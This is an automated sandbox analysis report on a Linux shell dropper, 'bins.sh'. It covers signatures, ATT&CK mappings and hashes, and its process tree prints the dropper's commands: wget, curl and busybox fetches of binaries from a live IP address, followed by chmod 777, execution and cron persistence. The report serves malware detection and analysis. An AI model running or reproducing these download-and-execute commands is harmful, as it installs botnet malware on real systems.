f3b37a4959c6343e3e1368fd68c6e8ef5da2e811cc7df5e5cd289399c5667878

Analysis

max time kernel
149s
max time network
168s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
24-11-2024 05:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

2eff4db1aec35dadd57ea962525f018b
SHA1

3d3b257f08b34cca400f3a527e8af3bc9bbc2770
SHA256

f3b37a4959c6343e3e1368fd68c6e8ef5da2e811cc7df5e5cd289399c5667878
SHA512

9ada41178570c692b386fcee9c50d4de9e4e3678c1c0f9ac27321bc96050a1f7bf301c57961379b0ad415b677a85b50d0d3b27ccdb98b4ed25c0676b1aa2bfec
SSDEEP

192:mdFW7YIy7q5qZq5EdIkxxs7q27FYIvJpvRRh7A/ALA94wy7jnDtmJpIaTXQ08atE:FGI/HUIE94wyBP5IE94wTLB

Score

9^/10

antivm defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

Contacts a large (2084) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodchmod

pid process

704 chmod
813 chmod
684 chmod

pid	process
704	chmod
813	chmod
684	chmod

Executes dropped EXE 3 IoCs

Processes:

U59jXOydvquUhHn4MKkSAbnLlVezXQJxQTgFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCMEUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9

ioc	pid	process
/tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT	685	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
/tmp/gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM	705	gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
/tmp/EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9	814	EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9

Renames itself 1 IoCs

Processes:

U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT

pid process

686 U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
execution persistence privilege_escalatio

Cron
T1053.003

Processes:

crontab

description ioc process

File opened for modification /var/spool/cron/crontabs/tmp.PWUHKn crontab
Enumerates running processes
Discovers information about currently running processes on the system
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
antivm

System Checks
T1497.001

Processes:

curl

description ioc process

File opened for reading /proc/cpuinfo curl

pid	process
686	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT

description	ioc	process
File opened for modification	/var/spool/cron/crontabs/tmp.PWUHKn	crontab

description	ioc	process
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT

description	ioc	process
File opened for reading	/proc/711/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/805/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1048/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/26/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/661/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/9/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/270/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/989/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1077/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1057/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1098/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/693/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/956/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1108/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1128/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/707/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1031/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1033/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1117/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/747/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1019/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1104/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/5/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/940/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/769/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/949/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1122/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/141/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/692/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1086/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/18/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1124/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1058/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1123/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/792/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/967/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/739/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/744/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/745/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/833/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1135/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/41/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/732/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/964/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1082/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/698/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/799/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1001/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/854/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/985/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1004/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/139/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/733/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/727/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/997/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1121/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/108/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/720/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/800/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1100/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/922/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/970/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/1083/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
File opened for reading	/proc/770/cmdline	U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT

Writes file to tmp directory 5 IoCs

Malware often drops required files in the /tmp directory.

Processes:

busyboxwgetcurlbusyboxbusybox

description	ioc	process
File opened for modification	/tmp/EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9	busybox
File opened for modification	/tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT	wget
File opened for modification	/tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT	curl
File opened for modification	/tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT	busybox
File opened for modification	/tmp/gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:653
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:658
- /usr/bin/wget
  wget http://87.120.125.191/bins/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
  2⤵
  - Writes file to tmp directory
  PID:660
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:675
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
  2⤵
  - Writes file to tmp directory
  PID:682
- /bin/chmod
  chmod 777 U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
  2⤵
  - File and Directory Permissions Modification
  PID:684
- /tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
  ./U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:685
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:687
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:688
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:689
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:690
- /bin/rm
  rm U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT
  2⤵
  PID:692
- /usr/bin/wget
  wget http://87.120.125.191/bins/gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
  2⤵
  PID:695
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
  2⤵
  PID:696
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
  2⤵
  - Writes file to tmp directory
  PID:699
- /bin/chmod
  chmod 777 gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
  2⤵
  - File and Directory Permissions Modification
  PID:704
- /tmp/gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
  ./gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
  2⤵
  - Executes dropped EXE
  PID:705
- /bin/rm
  rm gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM
  2⤵
  PID:712
- /usr/bin/wget
  wget http://87.120.125.191/bins/EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9
  2⤵
  PID:784
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9
  2⤵
  PID:793
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9
  2⤵
  - Writes file to tmp directory
  PID:808
- /bin/chmod
  chmod 777 EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9
  2⤵
  - File and Directory Permissions Modification
  PID:813
- /tmp/EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9
  ./EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9
  2⤵
  - Executes dropped EXE
  PID:814
- /bin/rm
  rm EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9
  2⤵
  PID:816
- /usr/bin/wget
  wget http://87.120.125.191/bins/Y8GpaZvz14KbHf9VFO5OUOkbFCjh3YR1G9
  2⤵
  PID:818

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/EUkSi0nK2LL2fdpGBSvW7ypwi4eEJGQTa9

Filesize
111KB

MD5
ca897a38f23ec23521ce0b1b83f8422d

SHA1
b8d2ab335346aba9a72bae0fe3533aca1ab7b66a

SHA256
043df61baf17d6a2353b418c5f87eebea4ca1c3fd6b63eaccc34d9bcd0556832

SHA512
10d3026b43167121b62786dde231a04e25eb27905989f59a92b5eba92134e30cea554a73e419d3a505e650ee4c474ee407103df335cd84bd8c0f3428ccc16feb

Download Submit
/tmp/U59jXOydvquUhHn4MKkSAbnLlVezXQJxQT

Filesize
141KB

MD5
3ca8decdb1e52c423c521bfff02ac200

SHA1
8621ecd6807109b8541912ad9e134f6fb49bfd48

SHA256
dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

SHA512
b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

Download Submit
/tmp/gFfQeXnyA0slYHWDWAt3QOGdl0H6zzPSCM

Filesize
151KB

MD5
6c583043d91c55aa470c08c87058e917

SHA1
abf65a5b9bba69980278ad09356e53de8bb89439

SHA256
2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948

SHA512
82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5

Download Submit
/var/spool/cron/crontabs/tmp.PWUHKn

Filesize
210B

MD5
4bf511a5efb2eb87b223b3b31922cbe3

SHA1
f0ba672f986adefe9e6d837be3481d2d0e21900c

SHA256
e63545c1a804a0bde0d139650fafc40894940614966a35f989cb87b1f82ff6c5

SHA512
a5ce2c8d6f03fcd9fa037136abd9f37733f241a3c421004b60750cfa8cd4d3ac9aa7c462a857d0ef4b6f602e6b0646fdd46a3081f2d134a9576f8de370316906

Download Submit